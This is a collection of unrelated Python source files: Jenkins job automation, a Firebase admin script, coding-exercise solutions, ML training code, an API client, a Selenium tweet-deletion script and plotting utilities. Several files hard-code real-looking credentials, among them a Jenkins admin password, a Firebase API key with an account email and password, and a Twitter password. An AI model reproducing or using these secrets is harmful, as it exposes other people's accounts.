{"seq_id":"601936808","text":"import datetime\nimport time\nimport calendar\nimport jenkins\nurl='http://10.22.158.60:8080/'\nusername='admin'\npassword='Aruba@123'\nserver = jenkins.Jenkins(url,username=username,password=password)\nversion=server.get_version()\nuser=server.get_whoami()\nprint(version)\nprint('Hello %s from Jenkins %s' % (user['fullName'], version))\nimport xml.etree.ElementTree as ET\n\n\ndef convert_xml_file_to_str():\n tree = ET.parse('C:\\\\centerdev\\\\rest-automation\\\\centerdev\\\\manage_jenkins\\\\config_job_xml\\\\job.xml')\n root = tree.getroot()\n result = str(ET.tostring(root, encoding='utf8', method='xml').decode())\n return result\n\ndef executeSuite(projectName,releaseName,suiteName,list_test_cases=None):\n\n job_name = ''\n project_name = server.get_job_name(projectName)\n if project_name == projectName:\n print(\"Project Folder is present\")\n else:\n server.create_job(projectName,jenkins.EMPTY_FOLDER_XML)\n print(\"Project Folder Created New\")\n\n release_name = projectName+'/'+releaseName\n release_name_from_server = server.get_job_name(projectName+'/'+releaseName)\n\n print(release_name_from_server)\n if releaseName == release_name_from_server:\n print(\"Release folder is present\")\n else:\n server.create_job(release_name, jenkins.EMPTY_FOLDER_XML)\n print(\"Release Folder Created New\")\n\n time_stamp = str(calendar.timegm(time.gmtime()))\n print(time_stamp)\n suite_name = projectName+'/'+releaseName+'/'+suiteName+'_'+time_stamp\n suite_name_from_server = server.get_job_name(suite_name)\n job_name = suite_name\n if suiteName == suite_name_from_server:\n print(\"Suite job already exists\")\n else:\n xml_file=convert_xml_file_to_str()\n print(xml_file)\n 
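# Resolve the suite's test file, splice the resulting nosetests command into the $COMMAND placeholder of the XML template, then register the job (for suiteName 'calc' the command becomes: nosetests test_calculator.py)\n 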
suite_file = getsuite_filename('2', suiteName)\n if list_test_cases is None:\n\n command = 'nosetests '+suite_file\n print(type(command))\n print(command)\n config = xml_file.replace('$COMMAND',command)\n job_name=suite_name\n server.create_job(job_name,config)\n\n else:\n command = 'nosetests ' + suite_file + ' '\n for testcase in list_test_cases:\n command = command + testcase + ' '\n print(command)\n config_file = convert_xml_file_to_str()\n new_config = config_file.replace('$COMMAND', command)\n server.create_job(job_name, new_config)\n\n\n next_bn = server.get_job_info(job_name)['nextBuildNumber']\n print(\"Next Build Number is \",next_bn)\n print(next_bn)\n server.build_job(job_name)\n\n\n\ndef getsuite_filename(customer_id,suite_name):\n suite_dict = {'calc' : 'test_calculator.py'}\n for k,v in list(suite_dict.items()):\n if k == suite_name:\n return suite_dict[k]\n\ndef execute_specific_test_cases(testcaselist,suite_name,projectName,releaseName):\n suite_file=getsuite_filename('2',suite_name)\n print(suite_file)\n command='nosetests '+suite_file+' '\n for testcase in testcaselist:\n command = command + testcase + ' '\n print(command)\n config_file=convert_xml_file_to_str()\n new_config = config_file.replace('$COMMAND',command)\n print(new_config)\n server.reconfig_job(projectName + '/' + releaseName + '/' + suite_name, new_config)\n print(\"Going to build re-configured job\")\n job_name=projectName + '/' + releaseName + '/' + suite_name\n server.build_job(job_name)\n return command\n\n\nexecuteSuite('aw10_new','early_access_new','calc')\n\n#execute_specific_test_cases(['test_add','test_minus'],'calc','aw10_new','early_access_new')\n\n\n","sub_path":"centerdev/manage_jenkins/get_jenkins_data.py","file_name":"get_jenkins_data.py","file_ext":"py","file_size_in_byte":3599,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"}
{"seq_id":"462280183","text":"import pyrebase\n\nconfig = {\n \"apiKey\": \"AIzaSyBO3tDLbtmVZ1ew4dGWLn_fvXJPVnbv90I\",\n \"authDomain\": \"flux-00.firebaseapp.com\",\n \"databaseURL\": \"https://flux-00.firebaseio.com\",\n \"storageBucket\": \"flux-00.appspot.com\"\n}\n\nfirebase = pyrebase.initialize_app(config)\n\ndb = firebase.database()\nauth = firebase.auth()\nstorage = firebase.storage()\n\nemail='evev1337@gmail.com'\npassword='naderevnu123'\n\nuser=auth.sign_in_with_email_and_password(email, password)\n\nuser=auth.refresh(user['refreshToken'])\n\ntoken = user['idToken']\n\ndef handout(amount,reason):\n amount=int(amount)\n i=input('Are you sure you want to hand out {ink} Ink for '.format(ink=amount)+str(reason)+': ')\n if i.lower() == 'y':\n print('Handing out candy...')\n users=db.child(\"Users\").get(token).val().keys()\n print(len(users))\n i=0\n for x in users:\n i+=1\n addInk(x,amount)\n push_notification(x,reason)\n print(i)\n print('Complete')\n return True\n else:\n print('Aborted')\n return False\ndef delete_note(note_id,reason='',user_id=''): #DOES NOT WORK\n print('Deleting note...')\n owners=db.child(\"Notes\").child(note_id).child('Owners').get(token).val()\n cost=int(db.child(\"Notes\").child(note_id).child('ink').get(token).val())\n print('Found {} owners'.format(len(owners)))\n print('Removing ownership from owners')\n i=0\n for x in owners:\n i+=1\n created=db.child(\"Users\").child(x).child('Notes').child('createdNotes').get(token).val()\n owned=db.child(\"Users\").child(x).child('Notes').child('ownedNotes').get(token).val()\n if note_id in created:\n created.pop(created.index(note_id))\n if created == 
[]:\n db.child(\"Users\").child(x).child('Notes').child('createdNotes').child(note_id).remove(token)\n db.child(\"Users\").child(x).child('Notes').child('createdNotes').child('None').set('Non',token)\n else:\n db.child(\"Users\").child(x).child('Notes').child('createdNotes').set(created,token)\n if note_id in owned:\n owned.pop(owned.index(note_id))\n if owned==[]:\n db.child(\"Users\").child(x).child('Notes').child('ownedNotes').child(note_id).remove(token)\n db.child(\"Users\").child(x).child('Notes').child('ownedNotes').child('None').set('Non',token)\n else:\n db.child(\"Users\").child(x).child('Notes').child('ownedNotes').set(owned,token) # write the pruned list back to ownedNotes\n addInk(x,cost)\n push_notification(x,'A note you owned has been deleted. {ink} Ink has been returned to your account'.format(ink=cost))\n print(i)\n print('Done')\n print('Deleting note...')\n db.child(\"Notes\").child(note_id).remove(token)\n if user_id != '':\n print('Pushing notification to creator')\n push_notification(user_id,reason)\n print('Complete')\n return True\ndef push_notification(id,data):\n if 'n_stack' not in db.child(\"Users\").child(id).get(token).val():\n db.child(\"Users\").child(id).child('n_stack').set(['genesis_notification'], token)\n stack=db.child(\"Users\").child(id).child('n_stack').get(token).val()\n stack.append(data)\n db.child(\"Users\").child(id).child('n_stack').set(stack, token)\n return True\ndef addInk(id,ink):\n ink=int(ink)\n try:\n nink=int(db.child(\"Users\").child(id).child('ink').get(token).val())+ink\n except:\n return False\n db.child(\"Users\").child(id).child('ink').set(nink,token)\n#handout(100,'You have received 100 Ink!
    Thank you for supporting our site and being alpha testers! Here is a reward of 100 Ink!')\n\n\n\n#delete_note('0061',reason='Testing so ur note has been delet sorry ani',user_id='rWnA7H4Y42TS2LkwpDJnnYrTS712')\n#some scripts...","sub_path":"scripty/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":3796,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"}
{"seq_id":"649586312","text":"# WOO this was tough\n\nfrom math import ceil\n\nn, k = map(int, input().split())\n\nnumProblemsInChapters = list(map(int, input().split()))\n\nnumPagesInChapters = []\n\nfor numProblems in numProblemsInChapters:\n numPagesInChapters.append(ceil(numProblems / k))\n\nchNum = 1\n\ntotal = 0\n\nwhile chNum - 1 < len(numPagesInChapters):\n if numProblemsInChapters[chNum - 1] >= sum(numPagesInChapters[:chNum]):\n\n # total += 1\n numPagesByEndOfCh = sum(numPagesInChapters[:chNum])\n numProblemsInThisChapter = numProblemsInChapters[chNum - 1]\n\n # print(\"Chapter number:\", str(chNum), \"Number of pages in total by the end of this chapter:\", str(\n # numPagesByEndOfCh))\n\n currentProblemNo = 1\n currentPageNo = sum(\n numPagesInChapters[:chNum]) - numPagesInChapters[chNum - 1] + 1\n # print(currentPageNo)\n while currentPageNo <= numPagesByEndOfCh:\n # print(\"Current page number\", str(currentPageNo), \"Current problem number\", str(currentProblemNo))\n if currentProblemNo == currentPageNo:\n # print(\"SPECIAL PROBLEM: PROBLEM\", str(currentProblemNo), \"@ PAGE\", str(currentPageNo))\n total += 1\n if currentProblemNo % k == 0 or currentProblemNo >= numProblemsInThisChapter:\n currentPageNo += 1\n currentProblemNo += 1\n\n chNum += 1\n\n# print()\nprint(total)\n","sub_path":"Algorithms/Implementation/Lisa's Workbook.py","file_name":"Lisa's Workbook.py","file_ext":"py","file_size_in_byte":1400,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"}
{"seq_id":"548398653","text":"\"\"\"GaussianMLPPolicy.\"\"\"\nimport numpy as np\nimport torch\n\nfrom garage.torch.modules import GaussianMLPModule\nfrom garage.torch.policies import Policy\n\n\nclass GaussianMLPPolicy(GaussianMLPModule, Policy):\n \"\"\"\n GaussianMLPPolicy.\n\n A policy that contains an MLP to make predictions based on a gaussian\n distribution.\n\n Args:\n env_spec (garage.envs.env_spec.EnvSpec): Environment specification.\n module : GaussianMLPModule to make predictions based on a gaussian\n distribution.\n :return:\n\n \"\"\"\n\n def __init__(self, env_spec, **kwargs):\n self._env_spec = env_spec\n self._obs_dim = env_spec.observation_space.flat_dim\n self._action_dim = env_spec.action_space.flat_dim\n\n GaussianMLPModule.__init__(self,\n input_dim=self._obs_dim,\n output_dim=self._action_dim,\n **kwargs)\n\n def forward(self, inputs):\n \"\"\"Forward method.\"\"\"\n return super().forward(inputs)\n\n def get_action(self, observation):\n \"\"\"Get a single action given an observation.\"\"\"\n with torch.no_grad():\n observation = observation.unsqueeze(0)\n dist = self.forward(observation)\n std = dist.variance**0.5\n return dist.rsample().squeeze(0).numpy(), dict(\n mean=dist.mean.squeeze(0), log_std=np.log(std).squeeze(0))\n\n def get_actions(self, observations):\n \"\"\"Get actions given observations.\"\"\"\n with torch.no_grad():\n dist = self.forward(observations)\n std = dist.variance**0.5\n return dist.rsample().detach().numpy(), dict(mean=dist.mean,\n 
log_std=np.log(std))\n","sub_path":"src/garage/torch/policies/gaussian_mlp_policy.py","file_name":"gaussian_mlp_policy.py","file_ext":"py","file_size_in_byte":1786,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"}
{"seq_id":"147758379","text":"import requests\r\nimport pandas as pd\r\nimport json\r\nimport numpy as np\r\n\r\nbase_url = \"https://api.oceanex.pro/v1\"\r\n\r\n\r\ndef orderbk(base_url):\r\n market = \"vetusdt\"\r\n limit = 5\r\n method_url = base_url + \"/order_book\"\r\n data = {\"market\": market, \"limit\": limit}\r\n r = requests.post(method_url, data=data)\r\n print(r.text)\r\n tdata = (json.loads(r.text))['data']['asks']\r\n print(\"asks. price with volume\")\r\n for i in (tdata):\r\n print(i)\r\n print(i[0])\r\n print(\"bids. price with volume\")\r\n tdata = (json.loads(r.text))['data']['bids'] # switch to the bids side of the book\r\n for i in (tdata):\r\n print(i)\r\n print(i[0])\r\n\r\n\r\norderbk(base_url)\r\n# method_url = base_url + \"/order_book/multi\"\r\n# markets = [\"vetusdt\", \"vetbtc\"]\r\n# limit = 5\r\n# data = {\r\n# \"markets[]\": markets,\r\n# \"limit\": limit\r\n# }\r\n# r = requests.post(method_url, data=data)\r\n# print(r.text)\r\n","sub_path":"orderbook.py","file_name":"orderbook.py","file_ext":"py","file_size_in_byte":833,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"}
{"seq_id":"565776832","text":"\n\"\"\" continue\nA while loop that prints only the \"odd\" numbers from 1 to 10.\n\nWhen num is even, the continue skips the print(num) call.\n\"\"\"\n\nnum = 0\nwhile num < 10:\n num = num+1\n if num % 2 == 0: # when num is even\n continue\n print(num)\n","sub_path":"PythonMain/src/ch04-operation/ch-while/ex05.py","file_name":"ex05.py","file_ext":"py","file_size_in_byte":252,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"}
{"seq_id":"248296894","text":"\"\"\"\nGiven an array where elements are sorted in ascending order, convert it to a height balanced BST.\nSource: https://leetcode.com/problems/convert-sorted-array-to-binary-search-tree/#/description\n\"\"\"\n# Definition for a binary tree node.\nclass TreeNode(object):\n def __init__(self, x):\n self.val = x\n self.left = None\n self.right = None\n\n\n#DO NOT CHANGE THIS CLASS\nclass Solution(object):\n def sortedArrayToBST(self, nums):\n #YOUR CODE GOES HERE\n ##\n if(len(nums) == 1):\n self.val = nums[0]\n return self\n elif(len(nums) == 2):\n self.val = nums[0]\n self.right = TreeNode(None)\n self.right.val = nums[1]\n self.left = TreeNode(None)\n self.left = None\n return self\n else:\n cut = int(len(nums)/2)\n self.val = nums[cut]\n self.left = TreeNode(None)\n self.left = Solution.sortedArrayToBST(self.left, nums[0:cut])\n self.right = TreeNode(None)\n self.right = Solution.sortedArrayToBST(self.right, nums[cut+1:])\n return self \n \n \n \n \"\"\"\n :type nums: List[int]\n :rtype: TreeNode\n \"\"\"\n\n# stump = TreeNode(None)\n# testList = [0,1,2,3,4,5,6,7]\n# stump = Solution.sortedArrayToBST(stump,testList)\n","sub_path":"problem_6/Fellow Codes Go Here/goodman_aaron.py","file_name":"goodman_aaron.py","file_ext":"py","file_size_in_byte":1359,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"}
{"seq_id":"234125952","text":"import os\nimport json\nimport tempfile\nimport subprocess\nfrom ruamel.yaml import YAML\nfrom ruamel.yaml.scanner import ScannerError\nfrom contextlib import contextmanager\n\nyaml = YAML(typ='safe', pure=True)\n\n@contextmanager\ndef decrypt_file(encrypted_path):\n \"\"\"\n Provide secure temporary decrypted contents of a given file\n\n If file isn't a 
sops encrypted file, we assume no encryption is used\n and return the current path.\n \"\"\"\n # We must first determine if the file is using sops\n # sops files are JSON/YAML with a `sops` key. So we first check\n # if the file is valid JSON/YAML, and then if it has a `sops` key\n with open(encrypted_path) as f:\n _, ext = os.path.splitext(encrypted_path)\n # Support the (clearly wrong) people who use .yml instead of .yaml\n if ext == '.yaml' or ext == '.yml':\n try:\n encrypted_data = yaml.load(f)\n except ScannerError:\n yield encrypted_path\n return\n elif ext == '.json':\n try:\n encrypted_data = json.load(f)\n except json.JSONDecodeError:\n yield encrypted_path\n return\n\n if 'sops' not in encrypted_data:\n yield encrypted_path\n return\n\n # If file has a `sops` key, we assume it's sops encrypted\n with tempfile.NamedTemporaryFile() as f:\n subprocess.check_call([\n 'sops',\n '--output', f.name,\n '--decrypt', encrypted_path\n ])\n yield f.name","sub_path":"deployer/utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":1535,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"269612410","text":"from utils import *\n\ndef grid_values(grid):\n # In this function, you will take a sudoku as a string\n # and return a dictionary where the keys are the boxes,\n # for example 'A1', and the values are the digit at each\n # box (as a string) or '.' if the box has no value\n # assigned yet.\n res = dict()\n\n for i,c in enumerate(grid):\n k = boxes[i]\n res[k] = c \n \n return res\n \nvalues = \"..3.2.6..9..3.5..1..18.64....81.29..7.......8..67.82....26.95..8..2.3..9..5.1.3..\"\ng = grid_values(values)\ndisplay(g)","sub_path":"AIND/lesson3/4/function.py","file_name":"function.py","file_ext":"py","file_size_in_byte":553,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"366513181","text":"from torch import cuda\nfrom onmt.trainer import Trainer\nfrom onmt.utils import ReportMgr\nfrom onmt.inputters import corpus, inputter, dynamic_iterator\nfrom config import defaults\n\nfrom onmt.models.model import NMTModel\nfrom onmt.utils.loss import NMTLossCompute\nfrom onmt.utils.optimizers import Optimizer\nfrom src.utils.dataset import Dataset\n\n\ndef training_iterator(ds: Dataset, vocab):\n # build the ParallelCorpus\n train = corpus.ParallelCorpus(\"corpus\", ds.train.source, ds.train.target)\n valid = corpus.ParallelCorpus(\"valid\", ds.val.source, ds.val.target)\n\n # build the training iterator\n iterator = dynamic_iterator.DynamicDatasetIter(\n corpora={\"corpus\": train},\n corpora_info={\"corpus\": {\"weight\": 1}},\n transforms={},\n fields=vocab,\n is_train=True,\n batch_type=\"tokens\",\n batch_size=4096,\n batch_size_multiple=1,\n data_type=\"text\")\n\n # build the validation iterator\n validator = dynamic_iterator.DynamicDatasetIter(\n corpora={\"valid\": valid},\n corpora_info={\"valid\": {\"weight\": 1}},\n transforms={},\n fields=vocab,\n is_train=False,\n batch_type=\"sents\",\n batch_size=8,\n batch_size_multiple=1,\n data_type=\"text\")\n \n # make sure the iteration happens on GPU 0 (-1 for CPU, N for GPU N)\n iterator = iter(inputter.IterOnDevice(iterator, 0 if cuda.is_available() else -1))\n validator = iter(inputter.IterOnDevice(validator, 0 if cuda.is_available() else -1))\n\n return iterator, validator\n\n\ndef training_session(model: NMTModel, loss: NMTLossCompute, opt: Optimizer, dropout: float = defaults.dropout):\n report_manager = 
ReportMgr(report_every=50, start_time=None, tensorboard_writer=None)\n session = Trainer(\n model=model,\n train_loss=loss,\n valid_loss=loss,\n optim=opt,\n report_manager=report_manager,\n dropout=dropout)\n\n return session","sub_path":"src/training.py","file_name":"training.py","file_ext":"py","file_size_in_byte":1957,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"}
{"seq_id":"196137323","text":"import requests\r\nimport json\r\n\r\n# Data API endpoint\r\nurl = 'https://view.inews.qq.com/g2/getOnsInfo?name=disease_h5'\r\n# Fetch the response and parse the embedded 'data' payload as JSON\r\ndata = json.loads(requests.get(url).json()['data'])\r\n# Last update time\r\nupdate_time = data['lastUpdateTime']\r\n# Nationwide totals\r\nchina_total = data['chinaTotal']\r\n# Per-province detail\r\nChina = data['areaTree'][0]['children']\r\n\r\n# Render the totals as the chart subtitle\r\nncp_info = 'Confirmed: {} Suspected: {} Deaths: {} Cured: {} Updated: {}'.format(\r\n china_total['confirm'],\r\n china_total['suspect'],\r\n china_total['dead'],\r\n china_total['heal'],\r\n update_time\r\n )\r\n\r\nprint(ncp_info)\r\n\r\nfrom pyecharts.charts import Map, Geo\r\nfrom pyecharts import options as opts\r\nfrom pyecharts.globals import GeoType\r\n\r\nc = (\r\n Geo()\r\n .add_schema(\r\n maptype='china',\r\n # Map region fill and border colors\r\n itemstyle_opts=opts.ItemStyleOpts(color=\"#323c48\", border_color=\"#111\"),\r\n )\r\n .add(\r\n 'geo',\r\n # Series data: province name plus confirmed count\r\n [list([China[i]['name'], China[i]['total']['confirm']]) for i in range(len(China))],\r\n # Ripple (effect scatter) markers\r\n type_=GeoType.EFFECT_SCATTER,\r\n )\r\n .set_series_opts(\r\n # Hide the point labels\r\n label_opts=opts.LabelOpts(is_show=False),\r\n )\r\n .set_global_opts(\r\n # Title and subtitle, centred\r\n title_opts=opts.TitleOpts(title=\"National Epidemic Map\", subtitle=ncp_info, pos_left='center'),\r\n # Color gradient; cap the maximum at the average value\r\n visualmap_opts=opts.VisualMapOpts(min_=0, max_=china_total['confirm']/len(data)),\r\n # Hide the legend\r\n legend_opts=opts.LegendOpts(is_show=False)\r\n )\r\n)\r\n\r\n# Save the map\r\nc.render(\"./epidemic_provinces_map.html\")","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":1793,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"}
{"seq_id":"382874772","text":"from selenium import webdriver\nfrom selenium.webdriver.common.keys import Keys\nfrom selenium.common.exceptions import NoSuchElementException, StaleElementReferenceException\nfrom time import sleep\nimport json\nimport datetime\n\ndriver = webdriver.Safari()\n# driver.implicitly_wait(10)\n\ndriver.get(\"https://twitter.com/gunnertech\")\nsleep(1)\n# driver.set_window_size(1, 1)\ndriver.find_element_by_css_selector(\"div.LoginForm-username input\").send_keys(\"gunnertech\")\ndriver.find_element_by_css_selector(\"div.LoginForm-password input\").send_keys(\"Twi2010!!\")\ndriver.find_element_by_css_selector(\"form.js-front-signin input.js-submit\").click()\n\nwhile True:\n sleep(1)\n for button in driver.find_elements_by_css_selector(\"button.ProfileTweet-actionButton.js-dropdown-toggle\"):\n button.click()\n sleep(1)\n driver.find_element_by_css_selector(\"li.js-actionDelete button\").click()\n sleep(1)\n driver.find_element_by_css_selector(\"button.delete-action\").click()\n sleep(1)\n driver.refresh()\n\nprint('all done here')\ndriver.close()\n","sub_path":"delete.py","file_name":"delete.py","file_ext":"py","file_size_in_byte":1063,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"}
{"seq_id":"32809454","text":"from __future__ import absolute_import, unicode_literals\n\n# standard library\nimport json\nfrom typing import Any, Dict\n\n# 
third-party\nfrom celery import shared_task\n\n# local Django\nfrom apps.product.models import ReportProduct\n\n\n@shared_task\ndef generate_day_report(data: Dict[str, Any]):\n \"\"\"\n ...\n \"\"\"\n\n # COUNT\n\n total_count: int = 0\n\n # DAY\n\n day_summary = []\n\n for number in range(24):\n # print(day_number + 1)\n hour = \"\"\n\n if len(str(number)) == 2 and number >= 10:\n hour = f\"{number}:00:00\"\n else:\n hour = f\"0{number}:00:00\"\n\n day_summary.append({\"hour\": hour, \"count\": 0})\n\n report = ReportProduct.objects.create(\n rformat=\"D\",\n total=json.dumps({\"total_count\": total_count}),\n summary=json.dumps({\"day_summary\": day_summary}),\n )\n report_id = report.id\n return f\"day report completed id: {report_id}\"\n","sub_path":"apps/product/tasks.py","file_name":"tasks.py","file_ext":"py","file_size_in_byte":923,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"297305059","text":"import os\nimport torch\nimport math\nfrom matplotlib import pyplot as plt\nimport numpy as np\nfrom torch import nn\nfrom os import path\nfrom IPython import display\nimport time\n\n\ntorch.manual_seed(12345)\nmin_x, max_x, delta_x = None, None, None\n\n\ndef set_default(figsize=(10, 10)):\n plt.style.use(['dark_background', 'bmh'])\n plt.rc('axes', facecolor='k')\n plt.rc('figure', facecolor='k')\n plt.rc('figure', figsize=figsize)\n\n\ndef get_data(n=1000, d=2, c=3, std=0.2):\n X = torch.zeros(n * c, d)\n y = torch.zeros(n * c, dtype=torch.long)\n for i in range(c):\n index = 0\n r = torch.linspace(0.2, 1, n)\n t = torch.linspace(\n i * 2 * math.pi / c,\n (i + 2) * 2 * math.pi / c,\n n\n ) + torch.randn(n) * std\n\n for ix in range(n * i, n * (i + 1)):\n X[ix] = r[index] * torch.FloatTensor((\n math.sin(t[index]), math.cos(t[index])\n ))\n y[ix] = i\n index += 1\n return X, y\n\n\ndef plot_data(X, y, ratio='1:1', d=0, zoom=1, save_path=None):\n plt.scatter(X.numpy()[:, 0], X.numpy()[:, 1], c=y, s=20, cmap=plt.cm.Spectral)\n plt.axis('square')\n if ratio == '1:1': plt.axis(np.array((-1.1, 1.1, -1.1, 1.1)) * zoom)\n elif ratio == '16:9': plt.axis(np.array((-2.0, 2.0, -2 / 16 * 9, 2 / 16 * 9)) * zoom)\n else: raise ValueError('Ratio not supported')\n plt.axis('off')\n\n _m, _c = 0, '.15'\n plt.axvline(0, ymin=_m, color=_c, lw=1, zorder=0)\n plt.axhline(0, xmin=_m, color=_c, lw=1, zorder=0)\n if save_path: plt.savefig(f'{save_path}{d:04d}.png')\n\n\ndef plot_curves(fig, ax, acc_hist, loss_hist):\n ax1, ax2 = ax\n ax1.cla(); ax2.cla()\n ax1.plot(acc_hist, 'C0')\n ax2.plot(loss_hist, 'C1')\n ax1.set_ylabel('Accuracy', color='C0')\n ax2.set_ylabel('Loss', color='C1')\n fig.canvas.draw()\n\n\ndef train(model, X, y, fig, ax, max_epochs=3000):\n # Or train from scratch\n criterion = torch.nn.CrossEntropyLoss()\n optimizer = torch.optim.Adam(model.parameters(), lr=1e-3)\n\n acc_hist = list()\n loss_hist = list()\n\n # Training\n for t in range(max_epochs + 1):\n\n # Feed forward to get the logits\n perm = torch.randperm(X.size(0))\n y_pred = model(X[perm])\n\n # Compute the loss and accuracy\n loss = criterion(y_pred, y[perm])\n score, predicted = torch.max(y_pred.data, 1)\n correct = (y[perm] == predicted).int().sum().item()\n acc = correct / len(y)\n\n print(\"[EPOCH]: %i, [LOSS]: %.6f, [ACCURACY]: %.3f\" % (t, loss.item(), acc))\n display.clear_output(wait=True)\n acc_hist.append(acc)\n loss_hist.append(loss.item())\n if t % 100 == 0 or correct - len(y) == 0 and t % 100 == 0:\n plot_curves(fig, ax, acc_hist, loss_hist)\n\n 
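# Standard PyTorch update: clear the gradients left over from the previous step, backpropagate the current loss, then let Adam apply the parameter update\n 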
optimizer.zero_grad()\n loss.backward()\n optimizer.step()\n\n if correct - len(y) == 0: break\n return acc_hist, loss_hist\n\n\ndef get_model(model_name, c=3):\n modules = list()\n if model_name == '5-Linear-4-LeakyReLU':\n for l in range(4):\n modules.append(nn.Linear(2, 2))\n modules.append(nn.LeakyReLU())\n modules.append(nn.Linear(2, 2))\n elif model_name == '2-Linear_H-100' or model_name == 'K-5_2-Linear_H-100':\n modules.append(nn.Linear(2, 100))\n modules.append(nn.LeakyReLU())\n modules.append(nn.Linear(100, 2))\n elif model_name == '1-Linear':\n modules.append(nn.Linear(2, 2))\n else: raise ValueError('Model name not existent')\n modules.append(nn.Linear(2, c))\n model = nn.Sequential(*modules)\n model.load_state_dict(torch.load(path.join(model_name, 'model_dict.pth')))\n acc_hist, loss_hist = torch.load(path.join(model_name, 'acc_loss.pth'))\n return model, (acc_hist, loss_hist)\n\n\ndef save_model(model_path, model, hist=None):\n if path.isdir(model_path):\n raise FileExistsError('Model directory already existent. Aborting.')\n os.mkdir(model_path)\n torch.save(model, path.join(model_path, 'model.pth'))\n torch.save(model.state_dict(), path.join(model_path, 'model_dict.pth'))\n if hist is not None:\n torch.save(hist, path.join(model_path, 'acc_loss.pth'))\n print(model_path, 'saved successfully.')\n\n\ndef plot_decision(model):\n mesh = np.arange(-1.1, 1.1, 0.01)\n xx, yy = np.meshgrid(mesh, mesh)\n with torch.no_grad():\n data = torch.tensor(np.vstack((xx.reshape(-1), yy.reshape(-1))).T).float()\n Z = model(data).detach()\n Z = np.argmax(Z, axis=1).reshape(xx.shape)\n plt.contourf(xx, yy, Z, cmap=plt.cm.Spectral, alpha=0.3)\n\n\ndef get_grid(ratio):\n global min_x, max_x, delta_x\n if ratio == '1:1':\n min_x, max_x, delta_x = -5.5, 5.5, .1\n min_y, max_y, delta_y = -5.5, 5.5, .1\n elif ratio == '16:9':\n min_x, max_x, delta_x = -10, 10, .1\n min_y, max_y, delta_y = -5.6, 5.6, .1\n else: raise ValueError('Ratio not supported')\n\n mesh_x = np.arange(min_x, max_x + delta_x, delta_x)\n mesh_y = np.arange(min_y, max_y + delta_y, delta_y)\n xx, yy = np.meshgrid(mesh_x, mesh_y)\n data = torch.tensor(np.vstack((xx.reshape(-1), yy.reshape(-1))).T).float()\n return data\n\n\ndef plot_grid(data):\n N_x = int((max_x - min_x) / delta_x + 1)\n d = data.numpy().reshape(-1, N_x, 2)\n x, y = d[:,:,0], d[:,:,1]\n plt.plot(x, y, c='.5', lw=1, zorder=0)\n plt.plot(x.T, y.T, c='.5', lw=1, zorder=0)\n\n\ndef plot_bases(bases, plotting=True, width=0.04):\n bases[2:] -= bases[:2]\n # if plot_bases.a: plot_bases.a.set_visible(False)\n # if plot_bases.b: plot_bases.b.set_visible(False)\n if plotting:\n plot_bases.a = plt.arrow(*bases[0], *bases[2], width=width, color='r', zorder=10, alpha=1., length_includes_head=True)\n plot_bases.b = plt.arrow(*bases[1], *bases[3], width=width, color='g', zorder=10, alpha=1., length_includes_head=True)\n\n\nplot_bases.a = None\nplot_bases.b = None\n\n\ndef in_out_interpolation(module, X_in, y, steps, action):\n I = torch.eye(2)\n X_in = torch.cat((I * 0, I, X_in))\n with torch.no_grad():\n X_out = module(X_in)\n interpolate(X_in, X_out, y, steps, action, plotting_bases=isinstance(module, nn.Linear))\n return X_out[4:]\n\n\ncount = 0\n\n\ndef interpolate(\n X_in, X_out, y, steps, action, p=1/50, plotting_bases=False,\n plotting_grid=False, K=3, ratio='1:1', single=False\n):\n global count\n N = K * 1000 + 4\n for t in range(steps):\n # a = (t / (steps - 1)) ** p\n a = ((p + 1)**(t / (steps - 1)) - 1) / p\n plt.gca().cla()\n plt.text(0, 5, action, color='w', 
horizontalalignment='center', verticalalignment='center')\n plot_data(a * X_out[4:N] + (1 - a) * X_in[4:N], y, zoom=5, ratio=ratio) #, d=steps*i+t)\n plot_bases(a * X_out[:4] + (1 - a) * X_in[:4], plotting=plotting_bases)\n if plotting_grid: plot_grid(a * X_out[N:] + (1 - a) * X_in[N:])\n plt.gcf().canvas.draw()\n # plt.savefig(f'/Users/atcold/Scratch/Spiral/in_out_K-5_2-Linear_H-100/{t:04d}.png')\n # plt.savefig(f'/Users/atcold/Scratch/Spiral/in_out_2-Linear-noise/{t:04d}.png')\n # plt.savefig(f'/Users/atcold/Scratch/Spiral/in_out_per_transformation/{count:04d}.png')\n count += 1\n plt.gcf().canvas.set_window_title(f'{t + 1}/{steps}')\n if not single:\n time.sleep(0.5)\n # for z in range(15):\n # plt.savefig(f'/Users/atcold/Scratch/Spiral/in_out_per_transformation/{count:04d}.png')\n # count += 1\n I = torch.eye(2)\n plot_bases(torch.cat((I * 0, I)), plotting=not plotting_bases)\n plt.gcf().canvas.draw()\n # for z in range(15):\n # plt.savefig(f'/Users/atcold/Scratch/Spiral/in_out_per_transformation/{count:04d}.png')\n # count += 1\n time.sleep(0.5)\n\n\ndef interpolate_rot(X_in, y, steps, M):\n global count\n theta = torch.atan2(M[1, 0], M[0, 0])\n I = torch.eye(2)\n X_in = torch.cat((I * 0, I, X_in))\n for t in range(steps):\n alpha = t / (steps - 1) * theta\n R = torch.tensor([\n [torch.cos(alpha), -torch.sin(alpha)],\n [torch.sin(alpha), torch.cos(alpha)]\n ])\n plt.gca().cla()\n plt.text(0, 5, 'Rotating', color='w', horizontalalignment='center', verticalalignment='center')\n plot_data(X_in[4:] @ R, y, zoom=5) # , 